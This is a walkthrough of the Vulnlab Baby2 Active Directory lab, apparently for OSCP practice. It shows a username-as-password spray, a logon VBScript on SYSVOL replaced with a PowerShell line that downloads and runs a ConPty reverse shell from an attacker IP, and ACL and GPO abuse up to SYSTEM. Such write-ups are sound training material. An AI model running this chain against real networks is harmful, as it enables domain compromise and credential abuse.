# Vulnlab’s Baby2 (Medium) Windows Machine – Writeup

Hello Everyone ! This is an writeup of Vulnlab's Baby2 machine. Baby2 is an Medium rated windows machine machine. It is one of the [TJNull's OSCP like machines](https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview#)
# Summary

Initial access is through finding a valid set of credentials , which has extensive permission to write on a share that hosts a vb script. Replacing the script with a malicious one get's our initial shell as user `Amelia.Griffiths`. From there, We could enumerate AD further to find interesting ACLs that the user `Amelia.Griffiths` have on `gpoadm` user. 

Further, `gpoadm` user have "GenericAll" rights over 2 GPOs, Using pyGPOAbuse, we can create and execute a scheduled task as SYSTEM user to add `gpoadm`  to the local administrator group granting us the administrator access.
# Enumeration
## NMAP Scan #

```bash
└─➜ sudo rustscan --ulimit 5000 -b 500 -a 10.10.110.149 -- -sC -sV -Pn | tee baby2.nmap                                                                                                                                                           [130]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.110.149:53
Open 10.10.110.149:88
Open 10.10.110.149:135
Open 10.10.110.149:139
Open 10.10.110.149:389
Open 10.10.110.149:445
Open 10.10.110.149:464
Open 10.10.110.149:593
Open 10.10.110.149:636
Open 10.10.110.149:3268
Open 10.10.110.149:3269
Open 10.10.110.149:3389
Open 10.10.110.149:9389
```
- Open ports - 53,88,389 are common in Domain Controller.
- Quick nxc scan confirm that, we are indeed dealing with a DC

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421220433.png)
- We also have anonymous login enabled and shares that have read and write privileges.

## Service Enumeration ##

- Let's dig deeper on the SMB service.
- I'm going to use impacket's smbclient to connect and enumerate the file system

```bash
smbclient.py baby2.vl\sdaasda@10.10.110.149
```
### Enumerating apps share

```bash
on smbclient

type `shares` to list all the shares
type `use <share_name>` - to select a share
tyep `mget *` - to download all files present
```

- 2 files - changelog and login.vbs.lnk files are present
- download both files

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421221134.png)
- CHANGELOG file hints about some automation activity

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421221708.png)
- Running strings on login.vbs.lnk shows that login.vbs script is most likely fetched from SYSVOL share. But we do not have access to SYSVOL share

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421231953.png)
### Enumerating homes share

- homes share is where we have read and write privileges
- It looks like C:/Users folder as it reveals so many usernames

 ![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421224521.png)

- Since there are many folder we can use nxe's spider_plus module to recursively look into the each folders and identify any interesting files
- Apparently there are no files available inside any of the folders

```bash
nxc smb 10.10.110.149 -u 'dsad' -p '' --shares -M spider_plus
```

### Enumerating NETLOGON share

- Only 1 file present - login.vbs
- It looks like the automation script that changelog talked about

At this point, Since we have a writable share, Tried [scf attack](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) on the homes share and was unsuccessful as there were no interaction received on responder to grab hashes.
## Initial Access ##

- With the usernames we got, let's check if they are valid and any AS-REP roastable users present

```bash
kerbrute userenum --dc 10.10.110.146 -d baby2.vl
```
![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421231328.png)
- All users are valid and no AS-REP roastable users present
- Next step is to check the description of the users, but LDAP anonymous bind is not enabled which stops us from doing few more checks.
- With no hints about passwords, our only option is to try bruteforce with usernames as password.

```bash
nxc smb 10.10.101.190 -u usernames -p usernames --no-bruteforce --continue-on-success
```
- `--no-bruteforce` flag will bruteforce line 1 to line 1 and don't mix match the provided list& `continue-on-sucess` flag will not stop the bruteforce with one valid combination

Excellent ! we got 2 user accounts, with a valid combination

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422182116.png)

### Enumerating Permissions

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422192917.png)
- Both the user has read & Write access to apps & docs shares. But It's always best to check the access manually on the shares as we cannot rely fully on the tool's output
- Since we have access to apps folder, I tried to replace login.vbs.lnk with a [malicious lnk file](https://github.com/blacklanternsecurity/mklnk) so that we can get our required interaction on responder to capture the NET-NTLMv2 hash.
- But no luck there, It allows us to upload new files but unable to replace a existing file
- No interesting files under `docs` directory as well
- We are left with SYSVOL, Upon enumeration it has the login.vbs file which is present on the .lnk file as previously mentioned, surprisingly we are allowed to put/replace files in that share
- Now the initial access starting to takes shape, Since we have a vb script present, we can put vbs reverse shell inside the script to get our initial shell
- I have added a vbs wscript shell execution code into login.vbs to execute my ConPty reverse shell

```bash
Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("powershell.exe IEX(IWR http://10.8.2.13:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.8.2.13 4444")
```

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422203333.png)

- Let's upload it into SYSVOL and wait for the callback
- Finally, we got our reverse shell as user Amelia.Griffiths

# AD Enumeration #

- As usual, the first step is to check the privileges `whoami /priv` and we don't see any privileges that we can abuse to escalate our privileges

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422203706.png)
- Using Powerview , Let's start enumerating the AD.
- Whenever I'm on an AD network, Below are the few things that I do no matter what, to get an overview about the field I'm in. Most of the time, these would give the quick wins or help us to understand the next possible steps  
	- Enumerate Users
	- Enumerate Users description
	- Enumerate Computers
	- Enumerate Domain shares
	- Enumerate Groups
	- Enumerate Non-Default group's members
	- Enumerate Domain Admin group members
	- Enumerate Interesting ACLs
	- Enumerate Kerberostable users
	- Enumerate AS-REP roastable users
	- Enumerate LAPS Delegated groups
	- Enumerate Unconstrained delegation
	- Enumerate Users & Computers with Constrained delegation

## Enumerating Interesting ACLs

```bash
Invoke-AClScanner -ResolveGUID
```

- Looks like gpoadm object has "GenericAll" access to group policies (snipped in screenshot)
- Also the legacy object has WriteDACL, WriteOwner access on gpoadm and gpo-management object

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422204929.png)
![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422205009.png)
- Also we are part of legacy group, with that we can takeover gpoadm user and then can abuse GenericAll access on group policies to escalate our privileges

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422205204.png)

# Privilege Escalation #

## Takeover gpoadm 

- First step is to add GenericAll rights on gpoadm.

```powershell
Add-DomainObjectAcl -TargetIdentity "gpoadm" -PrincipalIdentity "legacy" -Domain baby2.vl -Rights All -Verbose
```

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422205721.png)

- With the "GenericAll" rights, we can force change the password of gpoadm user

```powershell
net user gpoadm Password1! /domain
```

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422210022.png)
- We have successfully changed the password

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422210451.png)

## BloodHound Enumeration ##
- We already know that the gpoadm user has GenericAll rights over group policy objects. We'll also use bloodhound to look into it.
- Spin up Bloodhound CE

```bash
curl -L https://ghst.ly/getbhce | sudo docker-compose -f - up
```

- Download the latest release of [bloodhound.py](https://github.com/dirkjanm/BloodHound.py/tree/bloodhound-ce) which is compatible with the CE Edition

```bash
bloodhound-python -d 'baby2.vl' -u 'gpoadm' -p 'Password1!' -c all -ns 10.10.101.190
```

- Upload the results to bloodhound. we could see the same results visually that `gpoadm` user has `Generic All` access over 2 group policy objects

## Abusing GPO ##

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422212942.png)
- As per recommendation by BloodHound CE , We'll use [pyGPOAbuse.py.](https://github.com/Hackndo/pyGPOAbuse/blob/master/pygpoabuse.py) GPO-ID can be obtained from the bloodHound itself by selecting respective object

```bash
python3 pygpoabuse.py baby2.vl/gpoadm:'Password1!' -gpo-id '6AC1786C-XXXXXXXXXXX-00C04FB984F9' -command 'net localgroup administrators gpoadm /add' -f -dc-ip 10.10.101.190
```

- Give few minutes for the scheduled task to run.
- We have successfully added gpoadm user to Administrators group

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422225019.png)

- Login using impacket's psexec

```bash
psexec.py gpoadm:'Password1!'@10.10.119.236
```
![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422225157.png)

We are now logged in as nt authority\\system. I hope you enjoyed this writeup. For any questions/suggestions, Please feel free to connect with me on LinkedIn. 
# References #

- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#writedacl--writeowner
- https://github.com/dirkjanm/BloodHound.py/tree/bloodhound-ce
- https://github.com/Hackndo/pyGPOAbuse/blob/master/pygpoabuse.py
- https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
